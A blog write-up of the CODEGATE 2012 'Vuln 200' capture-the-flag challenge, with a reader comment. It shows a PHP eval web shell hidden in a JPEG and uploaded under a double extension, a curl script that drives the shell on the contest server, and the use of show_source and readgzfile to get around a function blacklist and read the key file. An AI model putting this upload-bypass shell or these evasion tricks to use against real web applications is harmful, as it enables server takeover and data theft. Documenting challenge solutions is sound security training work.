26
Feb
2012

CODEGATE 2012 – Vuln 200

Get a shell if you can!

This is a web application where you can upload an image. Cute. We tried uploading a JPG file with a PHP payload appended and called it kittens.jpg.php, and low and behold it worked! πŸ™‚

kittens.jpg.php:

/*JPEG DATA*/<?php eval($_GET['x']); ?>

Our php shell kept disappearing, so we wrapped it in a script that would upload a fresh one for every request. πŸ™‚

code.sh:

#!/bin/sh
FILENAME=`
  curl -s -F "file=@kittens.jpg.php" http://1.234.41.9/1olOI01/upload.php |
  awk -F '"' '{ print $19 }' |
  sed -e 's/\\\\//g'
`
DATA=`echo "echo 'START'; $1"|base64 -w 9000`
URL="http://1.234.41.9/1olOI01/images/${FILENAME}"
curl -s --data-urlencode x=${DATA} "${URL}" | strings | grep -A999 "START"
$ ./code.sh 'echo ini_get("disable_functions");'
basename,chgrp,chmod,chown,clearstatcache,copy,delete,dirname,disk_free_space,disk_total_space,diskfreespace,
fclose,feof,fflush,fgetc,fgetcsv,fgets,fgetss,file_exists,file_get_contents,file_put_contents,file,fileatime,filectime,
filegroup,fileinode,filemtime,fileowner,fileperms,filesize,filetype,flock,fnmatch,fopen,fpassthru,fputcsv,fputs,fread,
fscanf,fseek,fstat,ftell,ftruncate,fwrite,glob,is_dir,is_executable,is_file,is_link,is_readable,is_writable,is_writeable,
lchgrp,lchown,link,linkinfo,lstat,mkdir,parse_ini_file,parse_ini_string,pathinfo,pclose,popen,readfile,readlink,
realpath_ cache_get,realpath_cache_size,realpath,rename,rewind,rmdir,set_file_buffer,stat,symlink,tempnam,
tmpfile,touch,umask,unlinkbasename,chgrp,chmod,chown,clearstatcache,copy,delete,dirname,disk_free_space,
disk_total_space,diskfreespace,fclose,feof,fflush,fgetc,fgetcsv,fgets,fgetss,file_exists,file_get_contents,file_put_contents,
file,fileatime,filectime,filegroup,fileinode,filemtime,fileowner,fileperms,filesize,filetype,flock,fnmatch,fopen,fpassthru,
fputcsv,fputs,fread,fscanf,fseek,fstat,ftell,ftruncate,fwrite,glob,is_dir,is_executable,is_file,is_link,is_readable,is_writable,
is_writeable,lchgrp,lchown,link,linkinfo,lstat,mkdir,parse_ini_file,parse_ini_string,pathinfo,pclose,popen,readfile,
readlink,realpath

That’s alot of disabled routines! Luckily, we can at least traverse the filesystem using opendir()/readdir(), so after a while we run into:

$ ./code.sh '$dh=opendir("..\\\\..\\\\..\\\\Users\\\\codegate2\\\\Desktop\\\\"); while($f=readdir($dh)) echo $f."\n";'
START.
APMSETUP Monitor.lnk
Codegate 2012 Key.txt
desktop.ini

Now how do we read this magic txt file? file_get_contents and fopen() are blacklisted.. Then I got reminded of function aliases and showsource() .. which is *not* blacklisted πŸ™‚

$ ./code.sh 'var_dump(show_source("..\\\\..\\\\..\\\\Users\\\\codegate2\\\\Desktop\\\\Codegate 2012 Key.txt"));'
START<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?
<br /></span><span style="color: #FF8000">/*
<br />Good&nbsp;Job&nbsp;!
<br />
<br />Key&nbsp;is&nbsp;16b7a4c5162d4dee6a0a6286cd475dfb
<br />*/
<br /></span><span style="color: #0000BB">?&gt;</span>
</span>
</code>bool(true)

Flag: 16b7a4c5162d4dee6a0a6286cd475dfb

{One Response to “CODEGATE 2012 – Vuln 200”}

  1. Hi, cool writeup guys !

    We used readgzfile() function to bypass file_get_contents() filter and allow us to show file content.

    Hf.